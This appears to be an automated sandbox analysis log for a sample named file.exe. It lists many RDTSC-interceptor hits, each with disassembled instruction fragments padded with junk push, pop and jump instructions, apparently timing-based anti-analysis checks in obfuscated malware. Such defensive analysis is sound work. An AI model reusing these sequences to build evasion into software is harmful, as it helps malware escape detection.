Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DE7B second address: D8DE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A674 second address: D9A67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A289 second address: D9A2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FF0BCB462C0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A2A2 second address: D9A2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C6D4 second address: D9C6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C6EE second address: D9C6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C2BB second address: D9C2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C2C1 second address: D9C2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C426 second address: D9C43F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C43F second address: D9C44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FFEA second address: DA0009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF0BCB462BCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAED88 second address: DAEDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF0BC8515E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDAF second address: DAEDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462C3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDC8 second address: DAEDED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FF0BC8515D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDED second address: DAEDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDF1 second address: DAEDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8F5E second address: CD8F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB55D1 second address: DB55D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB55D6 second address: DB5611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C2h 0x00000007 jmp 00007FF0BCB462BFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0BCB462C3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5756 second address: DB575A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB575A second address: DB5764 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58B1 second address: DB58B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58B7 second address: DB58BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB58BB second address: DB58BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB59F7 second address: DB59FD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5C8F second address: DB5C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5F1A second address: DB5F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB5F21 second address: DB5F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB69A7 second address: DB69BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9672 second address: DB9689 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF0BC8515DBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9689 second address: DB96A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0BCB462C2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB96A0 second address: DB96A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB981B second address: DB9821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9821 second address: DB9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB9827 second address: DB9847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF0BCB462C6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBE536 second address: DBE53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEAC second address: DCAEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FF0BCB462B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEBE second address: DCAEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAEC2 second address: DCAF17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007FF0BCB462BAh 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jne 00007FF0BCB462B6h 0x00000019 jg 00007FF0BCB462B6h 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF0BCB462C8h 0x00000027 jmp 00007FF0BCB462C1h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83B9 second address: DD83BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83BF second address: DD83C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83C3 second address: DD83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83C7 second address: DD83EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 js 00007FF0BCB462B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83EE second address: DD83F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD83F3 second address: DD83F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC75C second address: DDC760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC760 second address: DDC770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FF0BCB462B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5233 second address: DF5267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF0BC8515D6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007FF0BC8515D6h 0x00000011 popad 0x00000012 jmp 00007FF0BC8515E7h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push edx 0x0000001a jp 00007FF0BC8515DCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF40DA second address: DF40E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF435C second address: DF4397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FF0BC8515E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF0BC8515D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4503 second address: DF4511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4511 second address: DF451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF48EF second address: DF490A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0BCB462BCh 0x00000008 jmp 00007FF0BCB462BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF490A second address: DF496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF0BC8515E0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FF0BC8515DAh 0x00000016 jmp 00007FF0BC8515E4h 0x0000001b popad 0x0000001c pushad 0x0000001d jns 00007FF0BC8515D6h 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FF0BC8515E7h 0x0000002a je 00007FF0BC8515D6h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF4C19 second address: DF4C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnc 00007FF0BCB462B6h 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jp 00007FF0BCB462B6h 0x0000001e popad 0x0000001f jnc 00007FF0BCB462B8h 0x00000025 push eax 0x00000026 push edx 0x00000027 jbe 00007FF0BCB462B6h 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF9542 second address: DF9546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFBFBD second address: DFBFC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC159 second address: DFC15E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC20F second address: DFC26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e jmp 00007FF0BCB462C8h 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FF0BCB462C3h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF0BCB462BDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC26D second address: DFC27A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4B3 second address: DFC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4B9 second address: DFC4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFC4BD second address: DFC4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD802 second address: DFD817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD817 second address: DFD833 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FF0BCB462B6h 0x00000015 js 00007FF0BCB462B6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFD833 second address: DFD839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5D8 second address: DFF5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462BDh 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5EA second address: DFF5F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF5F4 second address: DFF5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490F47 second address: 5490F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FF0BC8515E8h 0x0000000c adc eax, 7F0B4868h 0x00000012 jmp 00007FF0BC8515DBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, di 0x00000022 mov dl, 1Bh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480D97 second address: 5480DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF0BCB462BEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DC7 second address: 5480DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DCB second address: 5480DD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480DD1 second address: 5480E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515DDh 0x00000013 sbb si, C306h 0x00000018 jmp 00007FF0BC8515E1h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480E16 second address: 5480E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548077A second address: 5480792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480792 second address: 54807C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF0BCB462C6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov dl, cl 0x00000016 push eax 0x00000017 push edx 0x00000018 mov edi, 37EC41CCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54807C6 second address: 54807D5 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov bx, si 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54806DD second address: 54806E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54806E2 second address: 54806E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480466 second address: 5480498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0BCB462C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480498 second address: 548049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548049C second address: 54804A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A029D second address: 54A02AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02AD second address: 54A02BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02BE second address: 54A02C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02C4 second address: 54A02D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02D6 second address: 54A02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A02DA second address: 54A02F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0BCB462BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490DEC second address: 5490E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515E6h 0x00000009 or eax, 7E03D308h 0x0000000f jmp 00007FF0BC8515DBh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, bl 0x00000020 mov si, 7C6Fh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E28 second address: 5490E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BBh 0x00000009 adc ecx, 28427BFEh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 mov cx, 4847h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E67 second address: 5490E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E79 second address: 5490E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E7D second address: 5490E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E8C second address: 5490E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E90 second address: 5490E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
